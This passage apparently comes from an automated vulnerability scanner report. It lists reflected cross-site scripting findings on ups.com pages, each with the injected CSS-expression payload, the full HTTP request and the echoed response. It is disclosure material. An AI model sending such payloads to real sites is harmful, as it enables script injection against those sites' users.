Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44986


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enb37ff"style="x:expression(alert(1))"31afa948299/about/sites.html">
...[SNIP]...

1.38. http://www.ups.com/content/us/en/contact/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/contact/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d8f4"style%3d"x%3aexpression(alert(1))"fcfe492b074 was submitted in the REST URL parameter 2. This input was echoed as 2d8f4"style="x:expression(alert(1))"fcfe492b074 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /content/us2d8f4"style%3d"x%3aexpression(alert(1))"fcfe492b074/en/contact/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:27 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34942


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us2d8f4"style="x:expression(alert(1))"fcfe492b074/en/contact/index.html">
...[SNIP]...

1.39. http://www.ups.com/content/us/en/contact/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/contact/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa5fa"style%3d"x%3aexpression(alert(1))"9d771ad853c was submitted in the REST URL parameter 3. This input was echoed as aa5fa"style="x:expression(alert(1))"9d771ad853c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /content/us/enaa5fa"style%3d"x%3aexpression(alert(1))"9d771ad853c/contact/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34942


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enaa5fa"style="x:expression(alert(1))"9d771ad853c/contact/index.html">
...[SNIP]...

1.40. http://www.ups.com/content/us/en/freight/air_freight.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/air_freight.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65eef"style%3d"x%3aexpression(alert(1))"422f4a3ffb3 was submitted in the REST URL parameter 2. This input was echoed as 65eef"style="x:expression(alert(1))"422f4a3ffb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /content/us65eef"style%3d"x%3aexpression(alert(1))"422f4a3ffb3/en/freight/air_freight.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:55 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39188


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us65eef"style="x:expression(alert(1))"422f4a3ffb3/en/freight/air_freight.html">
...[SNIP]...

1.41. http://www.ups.com/content/us/en/freight/air_freight.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/air_freight.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf815"style%3d"x%3aexpression(alert(1))"af04c03eaf was submitted in the REST URL parameter 3. This input was echoed as bf815"style="x:expression(alert(1))"af04c03eaf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /content/us/enbf815"style%3d"x%3aexpression(alert(1))"af04c03eaf/freight/air_freight.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:56 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39186


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enbf815"style="x:expression(alert(1))"af04c03eaf/freight/air_freight.html">
...[SNIP]...

1.42. http://www.ups.com/content/us/en/freight/customsbrokerage.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/customsbrokerage.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38e44"style%3d"x%3aexpression(alert(1))"3c86ba18c31 was submitted in the REST URL parameter 2. This input was echoed as 38e44"style="x:expression(alert(1))"3c86ba18c31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /content/us38e44"style%3d"x%3aexpression(alert(1))"3c86ba18c31/en/freight/customsbrokerage.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:03 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37750


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us38e44"style="x:expression(alert(1))"3c86ba18c31/en/freight/customsbrokerage.html">
...[SNIP]...

1.43. http://www.ups.com/content/us/en/freight/customsbrokerage.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/customsbrokerage.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32303"style%3d"x%3aexpression(alert(1))"4d43a21c9a7 was submitted in the REST URL parameter 3. This input was echoed as 32303"style="x:expression(alert(1))"4d43a21c9a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /content/us/en32303"style%3d"x%3aexpression(alert(1))"4d43a21c9a7/freight/customsbrokerage.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:05 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37750


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en32303"style="x:expression(alert(1))"4d43a21c9a7/freight/customsbrokerage.html">
...[SNIP]...

1.44. http://www.ups.com/content/us/en/freight/expedite.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/expedite.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bec17"style%3d"x%3aexpression(alert(1))"a447423ebc1 was submitted in the REST URL parameter 2. This input was echoed as bec17"style="x:expression(alert(1))"a447423ebc1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /content/usbec17"style%3d"x%3aexpression(alert(1))"a447423ebc1/en/freight/expedite.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:55 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37504


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usbec17"style="x:expression(alert(1))"a447423ebc1/en/freight/expedite.html">
...[SNIP]...

1.45. http://www.ups.com/content/us/en/freight/expedite.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/expedite.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb98d"style%3d"x%3aexpression(alert(1))"6d07b93d538 was submitted in the REST URL parameter 3. This input was echoed as eb98d"style="x:expression(alert(1))"6d07b93d538 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /content/us/eneb98d"style%3d"x%3aexpression(alert(1))"6d07b93d538/freight/expedite.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:56 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37504


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/eneb98d"style="x:expression(alert(1))"6d07b93d538/freight/expedite.html">
...[SNIP]...

1.46. http://www.ups.com/content/us/en/freight/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97bdd"style%3d"x%3aexpression(alert(1))"a19badde730 was submitted in the REST URL parameter 2. This input was echoed as 97bdd"style="x:expression(alert(1))"a19badde730 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /content/us97bdd"style%3d"x%3aexpression(alert(1))"a19badde730/en/freight/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:54 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41387


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us97bdd"style="x:expression(alert(1))"a19badde730/en/freight/index.html">
...[SNIP]...

1.47. http://www.ups.com/content/us/en/freight/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b6f6"style%3d"x%3aexpression(alert(1))"c09d8225dde was submitted in the REST URL parameter 3. This input was echoed as 8b6f6"style="x:expression(alert(1))"c09d8225dde in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /content/us/en8b6f6"style%3d"x%3aexpression(alert(1))"c09d8225dde/freight/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:55 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41387


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en8b6f6"style="x:expression(alert(1))"c09d8225dde/freight/index.html">
...[SNIP]...

1.48. http://www.ups.com/content/us/en/freight/ocean_freight.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/ocean_freight.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a8dd"style%3d"x%3aexpression(alert(1))"fffaad3b696 was submitted in the REST URL parameter 2. This input was echoed as 8a8dd"style="x:expression(alert(1))"fffaad3b696 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /content/us8a8dd"style%3d"x%3aexpression(alert(1))"fffaad3b696/en/freight/ocean_freight.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:02 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38501


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us8a8dd"style="x:expression(alert(1))"fffaad3b696/en/freight/ocean_freight.html">
...[SNIP]...

1.49. http://www.ups.com/content/us/en/freight/ocean_freight.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/ocean_freight.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17b9c"style%3d"x%3aexpression(alert(1))"35cba245cf4 was submitted in the REST URL parameter 3. This input was echoed as 17b9c"style="x:expression(alert(1))"35cba245cf4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /content/us/en17b9c"style%3d"x%3aexpression(alert(1))"35cba245cf4/freight/ocean_freight.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:03 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38501


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en17b9c"style="x:expression(alert(1))"35cba245cf4/freight/ocean_freight.html">
...[SNIP]...

1.50. http://www.ups.com/content/us/en/freight/road_freight.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/road_freight.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb8ff"style%3d"x%3aexpression(alert(1))"0fcdf3c310f was submitted in the REST URL parameter 2. This input was echoed as fb8ff"style="x:expression(alert(1))"0fcdf3c310f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /content/usfb8ff"style%3d"x%3aexpression(alert(1))"0fcdf3c310f/en/freight/road_freight.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:57 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37911


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usfb8ff"style="x:expression(alert(1))"0fcdf3c310f/en/freight/road_freight.html">
...[SNIP]...

1.51. http://www.ups.com/content/us/en/freight/road_freight.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/freight/road_freight.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa4d4"style%3d"x%3aexpression(alert(1))"2cc934cd1f8 was submitted in the REST URL parameter 3. This input was echoed as aa4d4"style="x:expression(alert(1))"2cc934cd1f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /content/us/enaa4d4"style%3d"x%3aexpression(alert(1))"2cc934cd1f8/freight/road_freight.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:58 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37911


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enaa4d4"style="x:expression(alert(1))"2cc934cd1f8/freight/road_freight.html">
...[SNIP]...

1.52. http://www.ups.com/content/us/en/index.jsx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/index.jsx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b59c3"style%3d"x%3aexpression(alert(1))"cb5adea911c was submitted in the REST URL parameter 2. This input was echoed as b59c3"style="x:expression(alert(1))"cb5adea911c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /content/usb59c3"style%3d"x%3aexpression(alert(1))"cb5adea911c/en/index.jsx HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:59 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 124319


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usb59c3"style="x:expression(alert(1))"cb5adea911c/en/index.jsx">
...[SNIP]...

1.53. http://www.ups.com/content/us/en/index.jsx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/index.jsx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2732"style%3d"x%3aexpression(alert(1))"04a1cbd1897 was submitted in the REST URL parameter 3. This input was echoed as c2732"style="x:expression(alert(1))"04a1cbd1897 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /content/us/enc2732"style%3d"x%3aexpression(alert(1))"04a1cbd1897/index.jsx HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:00 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 124319


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enc2732"style="x:expression(alert(1))"04a1cbd1897/index.jsx">
...[SNIP]...

1.54. http://www.ups.com/content/us/en/locations/alliances/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/alliances/index.html

Issue detail

